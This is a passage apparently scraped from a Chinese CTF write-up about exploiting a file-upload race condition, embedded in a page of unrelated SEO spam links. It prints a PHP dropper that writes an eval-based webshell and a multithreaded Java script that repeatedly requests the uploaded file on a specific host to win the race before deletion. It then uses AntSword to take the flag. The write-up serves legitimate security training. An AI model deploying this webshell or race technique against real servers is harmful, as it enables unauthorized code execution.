当前位置: 首页 > news >正文

深圳网站开发费用任务放单平台

深圳网站开发费用,任务放单平台,软件开发 东莞,谷德设计网app漏洞攻击之文件上传条件竞争 wzsc_文件上传漏洞现象与分析思路编写攻击脚本和重放措施中国蚁剑拿flag wzsc_文件上传 漏洞现象与分析 只有一个upload前端标签元素,并且上传任意文件都会跳转到upload.php页面,判定是一个apache容器,开始扫描…

漏洞攻击之文件上传条件竞争

  • wzsc_文件上传
  • 漏洞现象与分析
  • 思路
  • 编写攻击脚本和重放措施
  • 中国蚁剑拿flag

wzsc_文件上传

漏洞现象与分析

在这里插入图片描述只有一个upload前端标签元素,并且上传任意文件都会跳转到upload.php页面,判定是一个apache容器,开始扫描web目录,查看是否有机可乘
在这里插入图片描述扫描得知有关键的flag.php页面和upload文件根路径和upload.php页面,php文件查看了都没有渲染有用的信息…但是upload文根重定向到文件上传的页面
在这里插入图片描述并且上传的php木马等都会被过滤,判断源码中有校验白名单,联想到文件上传的条件竞争

php校验文件上传的时候先写入,判断不符合后,再回退
由于服务器并发处(同时)理多个请求,假如a用户上传了一个文件,b用户访问a用户的文件就会出现以下三种情况:
1.访问时间点在上传文件之前,没有此文件
2.访问时间在上传文件之后,且服务器还未将其删除,文件存在
3.访问时间点在服务器删除文件之后,文件不存在

思路

思路清晰,先说BP
在服务器释放上传的php文件之前先让该文件被执行,那么操作权就在我们手上了,这里我们让生成蚁剑的webshell木马,再通过提权webshell获取源码拿到flag

编写攻击脚本和重放措施

php上传的脚本为:

<?php 
fputs(fopen("shell.php", "w"), '<?php @eval($_POST["cmd"]); ?>'); 
?>

执行该脚本打时候调用fopen函数,写入webshell的木马。
该脚本为upload,在burpsuite手动重放即可,记得点快一点
小编使用java多线程破坏服务器的退回操作,上脚本:

@SpringBootApplication
@Slf4j
public class Application {@Beanpublic OkHttpClient okHttpClient() {return new OkHttpClient();}private static final String requestUrl = "http://61.147.171.105:51022/upload/test.php";public static String sendRequest(OkHttpClient okHttpClient, String url) throws IOException {Request request = new Request.Builder().url(url).build();try (Response response = okHttpClient.newCall(request).execute()) {if (!response.isSuccessful()) {throw new IOException("Unexpected code " + response);}return Objects.requireNonNull(response.body()).string();}}public static void main(String[] args) {ConfigurableApplicationContext applicationContext = SpringApplication.run(Application.class, args);OkHttpClient okHttpClient = applicationContext.getBean("okHttpClient", OkHttpClient.class);for (int i = 0; i < 50; i++) {new Thread(() -> {int num = 0;while (true) {log.warn("{}第{}次请求", Thread.currentThread().getName(), num++);try {String resp = sendRequest(okHttpClient, requestUrl);log.info("数据获取成功{}", resp);System.exit(0);} catch (IOException e) {}}}, "threadNo" + i).start();}}
}

最终java脚本结束:
在这里插入图片描述
我们访问upload文根查看结果
在这里插入图片描述
木马上传成功!

中国蚁剑拿flag

在这里插入图片描述在这里插入图片描述

在这里插入图片描述提交flag
在这里插入图片描述

http://www.yidumall.com/news/58596.html

相关文章:

  • 网站开发费用计入科目seo搜索引擎优化就业前景
  • 聊城建网站互联网营销案例
  • 温州网站制作报价网站快速优化排名推荐
  • wordpress网站推翻重建怎么做线上推广
  • 做网站阿里云记录值怎么填网盘搜索神器
  • 产品营销类网站cps广告是什么意思
  • 做网站每年要交不费用吗中国搜索引擎
  • 如何做网站稳定客户真正永久免费的建站系统有哪些
  • 新手学做网站这本书成都新闻今日最新消息
  • 单位网站建设情况调查情况深圳关键词seo
  • 网站备案后怎么做实名认证无人在线观看高清视频单曲直播
  • 武昌做网站jw100天津关键词优化平台
  • 做网站配置服务器如何在google上免费推广
  • 仪征网站建设搜索引擎推广试题
  • 怎么做网站的站点地图网络小说排行榜
  • wordpress的修订上海网站seo外包
  • 网站显示结算网站怎么优化搜索
  • 哪家公司做的网站好今天特大军事新闻
  • iis7如何搭建网站哈尔滨百度网络推广
  • 注册去美国做住家保姆的网站今日新闻最新消息50字
  • 国内网站建设优化系统的软件
  • b站付费推广免费一键生成个人网站
  • 建设局官方网站营销公关
  • 营销型企业网站案例分析网络推广外包内容
  • 利用ps做兼职的网站整合营销是什么
  • php做网站首页的代码廊坊seo排名霸屏
  • 网站包括哪些主要内容免费站长工具
  • 企业网站建设需要考虑内容招聘seo专员
  • css3 网站模板百度云网盘资源
  • 网站名称图标如何做才能显示企业网站设计制作